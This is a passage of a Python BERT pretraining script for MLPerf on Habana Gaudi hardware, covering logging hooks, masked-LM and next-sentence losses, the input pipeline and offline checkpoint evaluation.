variable_readers = [name + '/Read/ReadVariableOp:0' for name in variable_names]
variable_assigners = [name + '/Assign' for name in variable_names]
variable_assigners_input1_name = [graph.get_operation_by_name(name + '/Assign').inputs[1].name for name in variable_names]
variable_name_to_assigner_input1_name = dict(zip(variable_names, variable_assigners_input1_name))
# save state_dict
state_dict = dict(zip(variable_names, variable_readers))
state_dict = session.run(fetches=state_dict)
# device warmup
fetches = [train_op_name, 'total_loss:0', 'global_step/add:0', 'Merge/MergeSummary:0', 'update_step:0', 'learning_rate:0', 'nsp_loss:0', 'mlm_loss:0', 'step_update:0']
for _ in range(self.num_accumulation_steps):
result = session.run(fetches)
session.run('global_step/add:0')
session.run('global_step/add:0')
session.run('global_step/add:0')
assert result[-1] == True
# restore data loader iterator
session.run(graph.get_operation_by_name('MakeIterator'))
# load state_dict
feed_dict = dict()
for key in variable_names:
feed_dict[variable_name_to_assigner_input1_name[key]] = state_dict[key]
session.run(fetches=variable_assigners, feed_dict=feed_dict)
self.mllogger.start(key=self.mllog.constants.RUN_START)
self.run_start_timestamp=time.time()
def before_run(self, run_context):
if self.block_started == False:
#self.checkpoint_timestamp_dict[self.cycle_index]=int(time.time()*1e3)
self.mllogger.start(key=self.mllog.constants.BLOCK_START, value=self.cycle_index + 1, metadata={self.mllog.constants.FIRST_EPOCH_NUM: int(self.cycle_index * self.num_steps_between_eval), self.mllog.constants.EPOCH_COUNT: int(self.num_steps_between_eval)})
self.block_started = True
if self.num_accumulation_steps <= 1:
return tf.estimator.SessionRunArgs(fetches=['step_update:0']) # global_step
else:
return tf.estimator.SessionRunArgs(fetches=['step_update:0', 'update_step:0']) # global_step, update_step
def after_run(self, run_context, run_values):
if self.num_accumulation_steps <=1:
self.global_step = run_values.results
update_step = True
else:
self.global_step, update_step = run_values.results
if update_step:
self.count += 1
if self.count >= self.schedule[self.cycle_index]:
self.mllogger.end(key=self.mllog.constants.BLOCK_STOP, value=self.cycle_index + 1, metadata={self.mllog.constants.FIRST_EPOCH_NUM: int(self.cycle_index * self.num_steps_between_eval)})
self.chpt_timestamp_dict[self.cycle_index + 1]=time.time()
self.checkpoint_timestamp_dict[self.cycle_index + 1]=int(time.time()*1e3)
self.block_stop_timestamp_dict[self.cycle_index + 1]=time.time()
self.cycle_index += 1
self.count = 0
self.block_started = False
def model_fn_builder(bert_config, init_checkpoint, learning_rate,
num_train_steps, num_warmup_steps,
use_one_hot_embeddings, weight_decay_rate, beta_1, beta_2, epsilon, power):
"""Returns `model_fn` closure for TPUEstimator."""
def model_fn(features, labels, mode, params): # pylint: disable=unused-argument
"""The `model_fn` for TPUEstimator."""
tf.compat.v1.logging.info("*** Features ***")
for name in sorted(features.keys()):
tf.compat.v1.logging.info(" name = %s, shape = %s" % (name, features[name].shape))
input_ids = features["input_ids"]
input_mask = features["input_mask"]
segment_ids = features["segment_ids"]
masked_lm_positions = features["masked_lm_positions"]
masked_lm_ids = features["masked_lm_ids"]
masked_lm_weights = features["masked_lm_weights"]
next_sentence_labels = features["next_sentence_labels"]
is_training = (mode == tf.estimator.ModeKeys.TRAIN)
model = modeling.BertModel(
config=bert_config,
is_training=is_training,
input_ids=input_ids,
input_mask=input_mask,
token_type_ids=segment_ids,
use_one_hot_embeddings=use_one_hot_embeddings,
compute_type=tf.float16 if FLAGS.manual_fp16 else tf.float32)
(masked_lm_loss,
masked_lm_example_loss, masked_lm_log_probs) = get_masked_lm_output(
bert_config, model.get_sequence_output(), model.get_embedding_table(),
masked_lm_positions, masked_lm_ids,
masked_lm_weights)
(next_sentence_loss, next_sentence_example_loss,
next_sentence_log_probs) = get_next_sentence_output(
bert_config, model.get_pooled_output(), next_sentence_labels)
masked_lm_loss = tf.identity(masked_lm_loss, name="mlm_loss")
next_sentence_loss = tf.identity(next_sentence_loss, name="nsp_loss")
total_loss = masked_lm_loss + next_sentence_loss
total_loss = tf.identity(total_loss, name='total_loss')
tvars = tf.compat.v1.trainable_variables()
initialized_variable_names = {}
if init_checkpoint:
(assignment_map, initialized_variable_names
) = modeling.get_assignment_map_from_checkpoint(tvars, init_checkpoint)
tf.compat.v1.train.init_from_checkpoint(init_checkpoint, assignment_map)
if FLAGS.verbose_logging:
tf.compat.v1.logging.info("**** Trainable Variables ****")
for var in tvars:
init_string = ""
if var.name in initialized_variable_names:
init_string = ", *INIT_FROM_CKPT*"
tf.compat.v1.logging.info(" %d :: name = %s, shape = %s%s", 0 if horovod_enabled() else hvd.rank(), var.name, var.shape,
init_string)
output_spec = None
if mode == tf.estimator.ModeKeys.TRAIN:
train_op = optimization.create_optimizer(
total_loss, learning_rate, num_train_steps, num_warmup_steps,
FLAGS.manual_fp16, FLAGS.amp, FLAGS.num_accumulation_steps, FLAGS.optimizer_type, FLAGS.allreduce_post_accumulation, FLAGS.init_loss_scale, weight_decay_rate, beta_1, beta_2, epsilon, power)
global train_op_name
train_op_name = train_op.name
output_spec = tf.estimator.EstimatorSpec(
mode=mode,
loss=total_loss,
train_op=train_op)
elif mode == tf.estimator.ModeKeys.EVAL:
def metric_fn(masked_lm_example_loss, masked_lm_log_probs, masked_lm_ids,
masked_lm_weights, next_sentence_example_loss,
next_sentence_log_probs, next_sentence_labels):
"""Computes the loss and accuracy of the model."""
masked_lm_log_probs = tf.reshape(masked_lm_log_probs,
[-1, masked_lm_log_probs.shape[-1]])
masked_lm_predictions = tf.argmax(
input=masked_lm_log_probs, axis=-1, output_type=tf.int32)
masked_lm_example_loss = tf.reshape(masked_lm_example_loss, [-1])
masked_lm_ids = tf.reshape(masked_lm_ids, [-1])
masked_lm_weights = tf.reshape(masked_lm_weights, [-1])
masked_lm_accuracy = tf.compat.v1.metrics.accuracy(
labels=masked_lm_ids,
predictions=masked_lm_predictions,
weights=masked_lm_weights)
masked_lm_mean_loss = tf.compat.v1.metrics.mean(
values=masked_lm_example_loss, weights=masked_lm_weights)
next_sentence_log_probs = tf.reshape(
next_sentence_log_probs, [-1, next_sentence_log_probs.shape[-1]])
next_sentence_predictions = tf.argmax(
input=next_sentence_log_probs, axis=-1, output_type=tf.int32)
next_sentence_labels = tf.reshape(next_sentence_labels, [-1])
next_sentence_accuracy = tf.compat.v1.metrics.accuracy(
labels=next_sentence_labels, predictions=next_sentence_predictions)
next_sentence_mean_loss = tf.compat.v1.metrics.mean(
values=next_sentence_example_loss)
return {
"masked_lm_accuracy": masked_lm_accuracy,
"masked_lm_loss": masked_lm_mean_loss,
"next_sentence_accuracy": next_sentence_accuracy,
"next_sentence_loss": next_sentence_mean_loss,
}
eval_metric_ops = metric_fn(
masked_lm_example_loss, masked_lm_log_probs, masked_lm_ids,
masked_lm_weights, next_sentence_example_loss,
next_sentence_log_probs, next_sentence_labels
)
output_spec = tf.estimator.EstimatorSpec(
mode=mode,
loss=total_loss,
eval_metric_ops=eval_metric_ops)
else:
raise ValueError("Only TRAIN and EVAL modes are supported: %s" % (mode))
return output_spec
return model_fn
def get_masked_lm_output(bert_config, input_tensor, output_weights, positions,
label_ids, label_weights):
"""Get loss and log probs for the masked LM."""
input_tensor = gather_indexes(input_tensor, positions)
with tf.compat.v1.variable_scope("cls/predictions"):
# We apply one more non-linear transformation before the output layer.
# This matrix is not used after pre-training.
with tf.compat.v1.variable_scope("transform"):
input_tensor = tf.compat.v1.layers.dense(
input_tensor,
units=bert_config.hidden_size,
activation=modeling.get_activation(bert_config.hidden_act),
kernel_initializer=modeling.create_initializer(
bert_config.initializer_range))
input_tensor = modeling.layer_norm(input_tensor)
# The output weights are the same as the input embeddings, but there is
# an output-only bias for each token.
output_bias = tf.compat.v1.get_variable(
"output_bias",
shape=[bert_config.vocab_size],
initializer=tf.compat.v1.zeros_initializer())
logits = tf.matmul(tf.cast(input_tensor, tf.float32), output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
log_probs = tf.nn.log_softmax(logits - tf.reduce_max(logits, keepdims=True, axis=-1), axis=-1)
#log_probs = tf.nn.log_softmax(logits, axis=-1)
label_ids = tf.reshape(label_ids, [-1])
label_weights = tf.reshape(label_weights, [-1])
one_hot_labels = tf.one_hot(
label_ids, depth=bert_config.vocab_size, dtype=tf.float32)
# The `positions` tensor might be zero-padded (if the sequence is too
# short to have the maximum number of predictions). The `label_weights`
# tensor has a value of 1.0 for every real prediction and 0.0 for the
# padding predictions.
per_example_loss = -tf.reduce_sum(input_tensor=log_probs * one_hot_labels, axis=[-1])
numerator = tf.reduce_sum(input_tensor=label_weights * per_example_loss)
denominator = tf.reduce_sum(input_tensor=label_weights) + 1e-5
loss = numerator / denominator
return (loss, per_example_loss, log_probs)
def get_next_sentence_output(bert_config, input_tensor, labels):
"""Get loss and log probs for the next sentence prediction."""
# Simple binary classification. Note that 0 is "next sentence" and 1 is
# "random sentence". This weight matrix is not used after pre-training.
with tf.compat.v1.variable_scope("cls/seq_relationship"):
output_weights = tf.compat.v1.get_variable(
"output_weights",
shape=[2, bert_config.hidden_size],
initializer=modeling.create_initializer(bert_config.initializer_range))
output_bias = tf.compat.v1.get_variable(
"output_bias", shape=[2], initializer=tf.compat.v1.zeros_initializer())
logits = tf.matmul(tf.cast(input_tensor, tf.float32), output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
log_probs = tf.nn.log_softmax(logits - tf.reduce_max(logits, keepdims=True, axis=-1), axis=-1)
labels = tf.reshape(labels, [-1])
one_hot_labels = tf.one_hot(labels, depth=2, dtype=tf.float32)
per_example_loss = -tf.reduce_sum(input_tensor=one_hot_labels * log_probs, axis=-1)
loss = tf.reduce_mean(input_tensor=per_example_loss)
return (loss, per_example_loss, log_probs)
def gather_indexes(sequence_tensor, positions):
"""Gathers the vectors at the specific positions over a minibatch."""
sequence_shape = modeling.get_shape_list(sequence_tensor, expected_rank=3)
batch_size = sequence_shape[0]
seq_length = sequence_shape[1]
width = sequence_shape[2]
flat_offsets = tf.reshape(
tf.range(0, batch_size, dtype=tf.int32) * seq_length, [-1, 1])
flat_positions = tf.reshape(positions + flat_offsets, [-1])
flat_sequence_tensor = tf.reshape(sequence_tensor,
[batch_size * seq_length, width])
output_tensor = tf.gather(flat_sequence_tensor, flat_positions)
return output_tensor
def input_fn_builder(input_files,
batch_size,
max_seq_length,
max_predictions_per_seq,
is_training,
num_cpu_threads=4):
"""Creates an `input_fn` closure to be passed to Estimator."""
def input_fn():
"""The actual input function."""
name_to_features = {
"input_ids":
tf.io.FixedLenFeature([max_seq_length], tf.int64),
"input_mask":
tf.io.FixedLenFeature([max_seq_length], tf.int64),
"segment_ids":
tf.io.FixedLenFeature([max_seq_length], tf.int64),
"masked_lm_positions":
tf.io.FixedLenFeature([max_predictions_per_seq], tf.int64),
"masked_lm_ids":
tf.io.FixedLenFeature([max_predictions_per_seq], tf.int64),
"masked_lm_weights":
tf.io.FixedLenFeature([max_predictions_per_seq], tf.float32),
"next_sentence_labels":
tf.io.FixedLenFeature([1], tf.int64),
}
# For training, we want a lot of parallel reading and shuffling.
# For eval, we want no shuffling and parallel reading doesn't matter.
if is_training:
d = tf.data.Dataset.from_tensor_slices(tf.constant(input_files))
if horovod_enabled() and FLAGS.is_dist_eval_enabled: d = d.shard(hvd_size(), hvd_rank())
d = d.repeat()
d = d.shuffle(buffer_size=len(input_files))
# `cycle_length` is the number of parallel files that get read.
cycle_length = min(num_cpu_threads, len(input_files))
# `sloppy` mode means that the interleaving is not exact. This adds
# even more randomness to the training pipeline.
d = d.apply(
tf.data.experimental.parallel_interleave(
tf.data.TFRecordDataset,
sloppy=is_training,
cycle_length=cycle_length))
d = d.shuffle(buffer_size=100)
else:
d = tf.data.TFRecordDataset(input_files)
# Since we evaluate for a fixed number of steps we don't want to encounter
# out-of-range exceptions.
if horovod_enabled(): d = d.shard(hvd_size(), hvd_rank())
d = d.repeat()
# We must `drop_remainder` on training because the TPU requires fixed
# size dimensions. For eval, we assume we are evaluating on the CPU or GPU
# and we *don't* want to drop the remainder, otherwise we wont cover
# every sample.
d = d.apply(
tf.data.experimental.map_and_batch(
lambda record: _decode_record(record, name_to_features),
batch_size=batch_size,
num_parallel_batches=num_cpu_threads,
drop_remainder=True if is_training else False))
return d
return input_fn
def _decode_record(record, name_to_features):
"""Decodes a record to a TensorFlow example."""
example = tf.io.parse_single_example(serialized=record, features=name_to_features)
# tf.Example only supports tf.int64, but the TPU only supports tf.int32.
# So cast all int64 to int32.
for name in list(example.keys()):
t = example[name]
if t.dtype == tf.int64:
t = tf.cast(t, dtype=tf.int32)
example[name] = t
return example
def main(_):
os.environ["TF_XLA_FLAGS"] = "--tf_xla_enable_lazy_compilation=false" #causes memory fragmentation for bert leading to OOM
tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.INFO)
dllogging = dllogger_class.dllogger_class(FLAGS.dllog_path)
if not FLAGS.do_train and not FLAGS.do_eval:
raise ValueError("At least one of `do_train` or `do_eval` must be True.")
# In multi-node scenario, on each of HLSes there must be a checkpoint directly in the output_dir (read by Phase 2).
# There may be only one worker with comm_local_rank() == 0 on each machine and this worker will put its checkpoints there.
# All other workers use sub-directories to keep checkpoints.
if horovod_enabled() and comm_local_rank() != 0:
FLAGS.output_dir = os.path.join(FLAGS.output_dir, f'worker_{hvd_rank()}')
bert_config = modeling.BertConfig.from_json_file(FLAGS.bert_config_file)
tf.io.gfile.makedirs(FLAGS.output_dir)
input_files = []
for input_file_dir in FLAGS.input_files_dir.split(","):
input_files.extend(tf.io.gfile.glob(os.path.join(input_file_dir, "*")))
if FLAGS.horovod and len(input_files) < hvd.size():
tf.compat.v1.logging.warning("Input files count lower then expected. Using single file for OVERFIT test.")
input_files = [input_files[0] for i in range(hvd.size())]
if FLAGS.amp and FLAGS.manual_fp16:
raise ValueError("AMP and Manual Mixed Precision Training are both activated! Error")
is_per_host = tf.compat.v1.estimator.tpu.InputPipelineConfig.PER_HOST_V2
# The Scoped Allocator Optimization is enabled by default unless disabled by a flag.
if condition_env_var('TF_DISABLE_SCOPED_ALLOCATOR', default=False):
session_config = tf.compat.v1.ConfigProto()
else:
from tensorflow.core.protobuf import rewriter_config_pb2 # pylint: disable=import-error
session_config = tf.compat.v1.ConfigProto()
session_config.graph_options.rewrite_options.scoped_allocator_optimization = rewriter_config_pb2.RewriterConfig.ON
enable_op = session_config.graph_options.rewrite_options.scoped_allocator_opts.enable_op
del enable_op[:]
enable_op.append("HorovodAllreduce")
if FLAGS.horovod:
session_config.gpu_options.visible_device_list = str(hvd.local_rank())
if hvd.rank() == 0:
tf.compat.v1.logging.info("***** Configuaration *****")
for key in FLAGS.__flags.keys():
tf.compat.v1.logging.info(' {}: {}'.format(key, getattr(FLAGS, key)))
tf.compat.v1.logging.info("**************************")
# config.gpu_options.per_process_gpu_memory_fraction = 0.7
if FLAGS.use_xla:
session_config.graph_options.optimizer_options.global_jit_level = tf.compat.v1.OptimizerOptions.ON_1
session_config.graph_options.rewrite_options.memory_optimization = rewriter_config_pb2.RewriterConfig.NO_MEM_OPT
if FLAGS.amp:
tf.compat.v1.enable_resource_variables()
run_config = tf.estimator.RunConfig(
model_dir=FLAGS.output_dir,
session_config=session_config,
save_checkpoints_steps=FLAGS.save_checkpoints_steps,
keep_checkpoint_max=19,
save_summary_steps=FLAGS.save_summary_steps,
log_step_count_steps=1)
if FLAGS.optimizer_type == "lamb":
weight_decay_rate=0.01
beta_1=0.9
beta_2=0.999
epsilon=1e-6
power = 1.0 #0.5
model_fn = model_fn_builder(
bert_config=bert_config,
init_checkpoint=FLAGS.init_checkpoint,
learning_rate=FLAGS.learning_rate if not FLAGS.horovod else FLAGS.learning_rate*hvd_size(),
num_train_steps=FLAGS.num_train_steps,
num_warmup_steps=FLAGS.num_warmup_steps,
use_one_hot_embeddings=False, weight_decay_rate=weight_decay_rate, beta_1=beta_1, beta_2=beta_2, epsilon=epsilon, power=power)
estimator = tf.estimator.Estimator(
model_fn=model_fn,
config=run_config)
batch_size_per_node = FLAGS.train_batch_size * FLAGS.num_accumulation_steps
global_batch_size = (hvd.size() if FLAGS.horovod else 1) * batch_size_per_node
write_hparams_v1(FLAGS.output_dir, {
'batch_size': FLAGS.train_batch_size,
'batch_size_per_pu': FLAGS.train_batch_size,
'batch_size_per_node': batch_size_per_node,
'global_batch_size': global_batch_size,
**{x: getattr(FLAGS, x) for x in FLAGS}
})
if FLAGS.do_train:
training_hooks = []
if horovod_enabled():
if os.environ.get("FORCE_WEIGHT_SYNC", "False").lower() in ["true", "1"]:
# Use this hook to allreduce trainable variables before the optimizer run
training_hooks.append(TrainableVarsAllreducingHookPreOpt(FLAGS.num_accumulation_steps))
train_log_hook = _LogSessionRunHook(
global_batch_size, FLAGS.num_accumulation_steps, dllogging,
FLAGS.display_loss_steps, FLAGS.save_checkpoints_steps, FLAGS.report_loss)
training_hooks.append(train_log_hook)
training_hooks.append(ExamplesPerSecondEstimatorHook(
batch_size=batch_size_per_node, output_dir=FLAGS.output_dir,
extra_metrics={'global_examples/sec': global_batch_size}))
mlperfhook = MLPerfHook(global_batch_size, FLAGS.num_accumulation_steps, FLAGS.num_train_steps, FLAGS.samples_between_eval,
weight_decay_rate, beta_1, beta_2, epsilon, power, FLAGS.enable_device_warmup)
training_hooks.append(mlperfhook)
tf.compat.v1.logging.info("***** Running training *****")
tf.compat.v1.logging.info(" Batch size = %d", FLAGS.train_batch_size)
train_input_fn = input_fn_builder(
input_files=input_files,
batch_size=FLAGS.train_batch_size,
max_seq_length=FLAGS.max_seq_length,
max_predictions_per_seq=FLAGS.max_predictions_per_seq,
is_training=True)
train_start_time = time.time()
estimator.train(input_fn=train_input_fn, hooks=training_hooks, max_steps=FLAGS.num_train_steps)
train_time_elapsed = time.time() - train_start_time
#do offline evaluation right after training for mlperf
tf.compat.v1.logging.info("***** Running offline evaluation right after training for mlperf *****")
converged = False
eval_start_time = time.time()
mlperf_chpt_timestamp_dict = mlperfhook.chpt_timestamp_dict
mlperf_run_start_timestamp = mlperfhook.run_start_timestamp
mlperf_checkpoint_timestamp_dict = mlperfhook.checkpoint_timestamp_dict
mlperf_mlloger = mlperfhook.mllogger
mlperf_mllog = mlperfhook.mllog
mlperf_block_stop_timestamp_dict = mlperfhook.block_stop_timestamp_dict
num_steps_between_eval = math.ceil(FLAGS.samples_between_eval / global_batch_size)
print("mlperf_run_start_timestamp={}".format(mlperf_run_start_timestamp))
print("mlperf_checkpoint_timestamp_dict={}".format(mlperf_checkpoint_timestamp_dict))
print("mlperf_block_stop_timestamp_dict={}".format(mlperf_block_stop_timestamp_dict))
chpt_file_path = FLAGS.output_dir + "/checkpoint"
chpt_files = []
with open(chpt_file_path, "r") as file:
for line in file:
tmp,chpt_step = line.split(":")
if tmp == 'all_model_checkpoint_paths':
step = int(chpt_step.strip().split("-")[1].strip('"'))
if step >0:
chpt_files.append(FLAGS.output_dir + '/'+ chpt_step.strip().strip('"'))
eval_files = []
for eval_file_dir in FLAGS.eval_files_dir.split(","):
eval_files.extend(tf.io.gfile.glob(os.path.join(eval_file_dir, "*")))
eval_input_fn = input_fn_builder(
input_files=eval_files,
batch_size=FLAGS.eval_batch_size,
max_seq_length=FLAGS.max_seq_length,
max_predictions_per_seq=FLAGS.max_predictions_per_seq,
is_training=False)
eval_hooks = [LogEvalRunHook(FLAGS.eval_batch_size)]
if horovod_enabled() and FLAGS.is_dist_eval_enabled:
tf.compat.v1.logging.info("***** Running offline distributed evaluation for mlperf *****")
#need to shard the dataset!!!!
eval_samples = 10000 / hvd_size()
max_eval_steps = math.ceil(FLAGS.max_eval_steps / hvd_size())
for ckpt_ind,chpt_path in enumerate(chpt_files):
print("checkpoint file path={}".format(chpt_path))
eval_results = estimator.evaluate(
input_fn=eval_input_fn, steps=max_eval_steps, hooks=eval_hooks, checkpoint_path=chpt_path)
if FLAGS.stop_threshold:
partial_eval_masked_lm_accuracy = eval_results["masked_lm_accuracy"] * eval_samples
print("per rank masked_lm_accuracy={}".format(eval_results["masked_lm_accuracy"]))
partial_eval_masked_lm_accuracy_FP32=tf.cast(partial_eval_masked_lm_accuracy, tf.float32)
total_eval_masked_lm_accuracy_FP32 = hvd.allreduce(partial_eval_masked_lm_accuracy_FP32, op=hvd.Sum)
total_eval_masked_lm_accuracy_FP32 /= 10000.0
mlperf_mlloger.event(key=mlperf_mllog.constants.EVAL_ACCURACY,value=total_eval_masked_lm_accuracy_FP32.numpy(), time_ms=mlperf_checkpoint_timestamp_dict[ckpt_ind + 1],metadata={'epoch_num': (ckpt_ind + 1)*FLAGS.samples_between_eval,'epoch_count': ckpt_ind + 1})
success = bool(total_eval_masked_lm_accuracy_FP32 >= FLAGS.stop_threshold)
print("average eval_masked_lm_accuracy_FP32={}".format(total_eval_masked_lm_accuracy_FP32))
if success:
mlperf_mlloger.end(key=mlperf_mllog.constants.RUN_STOP,value=total_eval_masked_lm_accuracy_FP32.numpy(), time_ms=mlperf_checkpoint_timestamp_dict[ckpt_ind + 1],metadata={'epoch_num': (ckpt_ind + 1)*FLAGS.samples_between_eval,'epoch_count': ckpt_ind + 1,'status': 'success'})
mlperf_mlloger.event(key=mlperf_mllog.constants.SUBMISSION_BENCHMARK, value=mlperf_mllog.constants.BERT)
mlperf_mlloger.event(key=mlperf_mllog.constants.SUBMISSION_ORG, value='Habana')
mlperf_mlloger.event(key=mlperf_mllog.constants.SUBMISSION_DIVISION, value='closed')
mlperf_mlloger.event(key=mlperf_mllog.constants.SUBMISSION_PLATFORM, value='gaudi-8')
mlperf_mlloger.event(key=mlperf_mllog.constants.SUBMISSION_STATUS, value='onprem')
converged = True
print("converged")
step = int(chpt_path.strip().split("-")[1].strip('"'))
print("step={}".format(step))
converge_block_idx = int(step / num_steps_between_eval )
print("converged at step:{}, block:{}".format(step, converge_block_idx))
break
eval_time_elapsed = time.time() - eval_start_time
print("Total offline distributed evaluation time={} seconds".format(eval_time_elapsed))
if converged:
total_train_time_secs = (mlperf_block_stop_timestamp_dict[converge_block_idx] - mlperf_run_start_timestamp)
mlperf_run_stop_timestamp = mlperf_block_stop_timestamp_dict[converge_block_idx] + eval_time_elapsed
time_to_train_minutes = (total_train_time_secs + eval_time_elapsed) / 60
print("Total offline distributed evaluation time={} seconds".format(eval_time_elapsed))
print("Total time-to-train is {} minutes ( = pure training time {} minutes + pure evaluation time {} minutes), converged in {} blocks ".format(time_to_train_minutes, total_train_time_secs/60, eval_time_elapsed / 60, converge_block_idx))
else:
mlperf_mlloger.end(key=mlperf_mllog.constants.RUN_STOP,value=total_eval_masked_lm_accuracy_FP32.numpy(),time_ms=mlperf_checkpoint_timestamp_dict[ckpt_ind + 1],metadata={'epoch_num': (ckpt_ind + 1)*FLAGS.samples_between_eval,'epoch_count': ckpt_ind + 1,'status': 'fail'})
else:
tf.compat.v1.logging.info("***** Running offline NON-distributed evaluation for mlperf *****")
for ckpt_ind,chpt_path in enumerate(chpt_files):
print("checkpoint file path={}".format(chpt_path))
eval_results = estimator.evaluate(
input_fn=eval_input_fn, steps=FLAGS.max_eval_steps, hooks=eval_hooks, checkpoint_path=chpt_path)
mlperf_mlloger.event(key=mlperf_mllog.constants.EVAL_ACCURACY,value=eval_results["masked_lm_accuracy"],time_ms=mlperf_checkpoint_timestamp_dict[ckpt_ind + 1],metadata={'epoch_num': (ckpt_ind + 1)*FLAGS.samples_between_eval,'epoch_count': ckpt_ind + 1})
print("per rank mlm accuracy={}".format(eval_results["masked_lm_accuracy"]))
if FLAGS.stop_threshold:
success = bool(eval_results["masked_lm_accuracy"] >= FLAGS.stop_threshold)
if horovod_enabled():
past_treshold = tf.cast(past_stop_threshold(
FLAGS.stop_threshold, eval_results["masked_lm_accuracy"]), tf.float32)
global_past_treshold = tf.math.greater(
hvd.allreduce(past_treshold, op=hvd.Sum), tf.zeros(1, tf.float32))
if global_past_treshold.numpy():
converged = True
print("converged")
step = int(chpt_path.strip().split("-")[1].strip('"'))
print("step={}".format(step))
converge_block_idx = int(step / num_steps_between_eval )
print("converged at step:{}, block:{}".format(step, converge_block_idx))
break
else:
if past_stop_threshold(
FLAGS.stop_threshold, eval_results["masked_lm_accuracy"]):
converged = True
print("converged")
step = int(chpt_path.strip().split("-")[1].strip('"'))
print("step={}".format(step))
converge_block_idx = int(step / num_steps_between_eval )
print("converged at step:{}, block:{}".format(step, converge_block_idx))
break
eval_time_elapsed = time.time() - eval_start_time
print("Total offline non-distributed evaluation time={} seconds".format(eval_time_elapsed))
if converged:
total_train_time_secs = (mlperf_block_stop_timestamp_dict[converge_block_idx] - mlperf_run_start_timestamp)
mlperf_run_stop_timestamp = mlperf_block_stop_timestamp_dict[converge_block_idx] + eval_time_elapsed
time_to_train_minutes = (total_train_time_secs + eval_time_elapsed) / 60
mlperf_mlloger.end(key=mlperf_mllog.constants.RUN_STOP,value=eval_results["masked_lm_accuracy"],time_ms=mlperf_checkpoint_timestamp_dict[ckpt_ind + 1],metadata={'epoch_num': (ckpt_ind + 1)*FLAGS.samples_between_eval,'epoch_count': ckpt_ind + 1,'status': 'success'})
print("Total time-to-train is {} minutes ( = pure training time {} minutes + pure evaluation time {} minutes), converged in {} blocks ".format(time_to_train_minutes, total_train_time_secs/60, eval_time_elapsed / 60, converge_block_idx))
else:
mlperf_mlloger.end(key=mlperf_mllog.constants.RUN_STOP,value=eval_results["masked_lm_accuracy"],time_ms=mlperf_checkpoint_timestamp_dict[ckpt_ind + 1],metadata={'epoch_num': (ckpt_ind + 1)*FLAGS.samples_between_eval,'epoch_count': ckpt_ind + 1,'status': 'fail'})
if FLAGS.do_eval:
converged = False
num_steps_between_eval = math.ceil(FLAGS.samples_between_eval / global_batch_size)
eval_start_time = time.time()
#Stand-alone offline evaluation of multiple checkpoints
chpt_file_path = FLAGS.output_dir + "/checkpoint"
chpt_files = []
with open(chpt_file_path, "r") as file:
for line in file:
tmp,chpt_step = line.split(":")
if tmp == 'all_model_checkpoint_paths':
step = int(chpt_step.strip().split("-")[1].strip('"'))
if step > 0:
chpt_files.append(FLAGS.output_dir + '/'+ chpt_step.strip().strip('"'))
eval_files = []
for eval_file_dir in FLAGS.eval_files_dir.split(","):
eval_files.extend(tf.io.gfile.glob(os.path.join(eval_file_dir, "*")))
eval_input_fn = input_fn_builder(
input_files=eval_files,
batch_size=FLAGS.eval_batch_size,
max_seq_length=FLAGS.max_seq_length,
max_predictions_per_seq=FLAGS.max_predictions_per_seq,
is_training=False)
eval_hooks = [LogEvalRunHook(FLAGS.eval_batch_size)]
if horovod_enabled() and FLAGS.is_dist_eval_enabled:
tf.compat.v1.logging.info("***** Running standalone offline distributed evaluation for mlperf *****")
#need to shard the dataset!!!!
eval_samples = 10000 / hvd_size()
max_eval_steps = math.ceil(FLAGS.max_eval_steps / hvd_size())
for chpt_path in chpt_files:
print("checkpoint file path={}".format(chpt_path))
eval_results = estimator.evaluate(
input_fn=eval_input_fn, steps=max_eval_steps, hooks=eval_hooks, checkpoint_path=chpt_path)
if FLAGS.stop_threshold:
partial_eval_masked_lm_accuracy = eval_results["masked_lm_accuracy"] * eval_samples
print("per rank masked_lm_accuracy={}".format(eval_results["masked_lm_accuracy"]))
partial_eval_masked_lm_accuracy_FP32=tf.cast(partial_eval_masked_lm_accuracy, tf.float32)
total_eval_masked_lm_accuracy_FP32 = hvd.allreduce(partial_eval_masked_lm_accuracy_FP32, op=hvd.Sum)
total_eval_masked_lm_accuracy_FP32 /= 10000.0
success = bool(total_eval_masked_lm_accuracy_FP32 >= FLAGS.stop_threshold)
print("average eval_masked_lm_accuracy_FP32={}".format(total_eval_masked_lm_accuracy_FP32))
if success:
converged = True
step = int(chpt_path.strip().split("-")[1].strip('"'))
converge_block_idx = int(step / num_steps_between_eval )
print("converged at step:{}, block:{}".format(step, converge_block_idx))
break
eval_time_elapsed = time.time() - eval_start_time
print("Total stand-alone offline distributed evaluation time={} seconds".format(eval_time_elapsed))
else:
tf.compat.v1.logging.info("***** Running standalone offline NON-distributed evaluation for mlperf *****")
for chpt_path in chpt_files:
print("checkpoint file path={}".format(chpt_path))
eval_results = estimator.evaluate(
input_fn=eval_input_fn, steps=FLAGS.max_eval_steps, hooks=eval_hooks, checkpoint_path=chpt_path)
print("per rank mlm accuracy={}".format(eval_results["masked_lm_accuracy"]))
if FLAGS.stop_threshold:
success = bool(eval_results["masked_lm_accuracy"] >= FLAGS.stop_threshold)
if horovod_enabled():
past_treshold = tf.cast(past_stop_threshold(
FLAGS.stop_threshold, eval_results["masked_lm_accuracy"]), tf.float32)
global_past_treshold = tf.math.greater(
hvd.allreduce(past_treshold, op=hvd.Sum), tf.zeros(1, tf.float32))
if global_past_treshold.numpy():
converged = True
step = int(chpt_path.strip().split("-")[1].strip('"'))
converge_block_idx = int(step / num_steps_between_eval )
print("converged at step:{}, block:{}".format(step, converge_block_idx))
break
else:
if past_stop_threshold(
FLAGS.stop_threshold, eval_results["masked_lm_accuracy"]):
converged = True
step = int(chpt_path.strip().split("-")[1].strip('"'))
converge_block_idx = int(step / num_steps_between_eval )
print("converged at step:{}, block:{}".format(step, converge_block_idx))
break
eval_time_elapsed = time.time() - eval_start_time
print("Total stand-alone offline non-distributed evaluation time={} seconds".format(eval_time_elapsed))
if __name__ == "__main__":
init_flags()
print("*****************************************")
print("Arguments passed to this program: run_pretraining.")
for key in FLAGS.__flags.keys():
print("{} = {}".format(key, getattr(FLAGS,key)))
if FLAGS.horovod:
hvd_init()
load_habana_module()
flags.mark_flag_as_required("input_files_dir")
if FLAGS.do_eval:
flags.mark_flag_as_required("eval_files_dir")
flags.mark_flag_as_required("bert_config_file")
flags.mark_flag_as_required("output_dir")
if FLAGS.use_xla and FLAGS.manual_fp16:
print('WARNING! Combining --use_xla with --manual_fp16 may prevent convergence.')
print(' This warning message will be removed when the underlying')
print(' issues have been fixed and you are running a TF version')
print(' that has that fix.')
